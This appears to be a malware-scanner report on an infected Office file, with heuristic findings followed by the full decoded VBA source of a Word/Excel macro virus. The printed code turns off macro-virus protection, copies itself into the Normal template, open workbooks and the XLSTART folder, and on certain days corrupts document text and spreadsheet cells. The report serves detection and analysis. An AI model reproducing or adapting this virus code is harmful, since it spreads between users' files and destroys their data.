MALICIOUS
322
Risk Score
Heuristics 7
-
ClamAV: Doc.Trojan.Hopper-7 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hopper-7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set xlApp = CreateObject("Excel.Application") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set WordObj = GetObject(, "Word.Application") -
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1." -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm� In document text (OLE body)
- http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htmIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6397 bytes |
SHA-256: fcfe587336906b8f0ee1adc7151fc22f3ee65937d733730af42b6d04827ea4f0 |
|||
|
Detection
ClamAV:
Doc.Trojan.Hopper-7
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.4 /1nternal
Private InRoutine As Boolean
Private Sub Document_Close()
On Error Resume Next
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Options.VirusProtection = False
Set NT = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
Set AD = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
xlApp.Workbooks("Book1.").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
xlApp.Workbooks("Book1.").Close SaveChanges:=True
End If
xlApp.Application.Quit
End If
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
Select Case Day(Now)
Case 15 And (Int((10 * Rnd) + 1) = 1)
ActiveDocument.FollowHyperlink Address:="http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm", NewWindow:=True, AddHistory:=False
Case 1 And (Int((10 * Rnd) + 1) = 1)
For i = 1 To ActiveDocument.Characters.Count
If ActiveDocument.Characters(i).Text = "I" Then ActiveDocument.Characters(i).Text = "1"
Next
Case 5 And (Int((10 * Rnd) + 1) = 1)
For i = 1 To ActiveDocument.Words.Count
If ActiveDocument.Words(i).Text = "not" Then ActiveDocument.Words(i).Text = ""
Next
Case 10 And (Int((15 * Rnd) + 1) = 1)
With Assistant.NewBalloon
.Heading = "Cross.BadSeed v0.4"
.Text = "Programmer: 1nternal" + Chr(13) + "Class Infection: VicodenES" + Chr(13) + "ActiveX Concept: 1nternal" + Chr(13) + "Book1. Concept: VicodenES" + Chr(13) + Chr(13) + "1nternal also wishes to thank all contributors and supporters which have made Cross.BadSeed possible."
.Show
End With
Case 20 And (Int((5 * Rnd) + 1) = 1)
Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
End Select
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
InRoutine = True
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "End Sub"
WordObj.Run "Normal.ThisDocument.DisableAV"
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
End If
Set NT = Nothing
If Quit = True Then WordObj.Application.Quit
Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
Workbooks("Book1.").Close SaveChanges:=True
End If
For i = 1 To Workbooks.Count
If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
End If
Next
If ActiveWorkbook.Name <> "Book1." Then
Select Case Day(Now)
Case 1 And Int((Rnd * 10) + 1) = 1
For i = 1 To 10
ActiveSheet.Cells(Int(Rnd * 100), Int(Rnd * 100)).AddComment "Cross.BadSeed v0.4"
Next
Case 10 And Int((Rnd * 3) + 1) = 1
For f = 1 To 5
CellCol = Int(Rnd * 15) + 2
For i = 1 To 30
Row1 = Int(Rnd * 200) + 10
Row2 = Int(Rnd * 200) + 10
TempVal = ActiveSheet.Cells(Row1, CellCol)
ActiveSheet.Cells(Row1, CellCol) = ActiveSheet.Cells(Row2, CellCol)
ActiveSheet.Cells(Row2, CellCol) = TempVal
Next
Next
Case 15
Author = "1nternal"
Case 20 And Int((Rnd * 5) + 1) = 1
Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
End Select
End If
End Sub
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.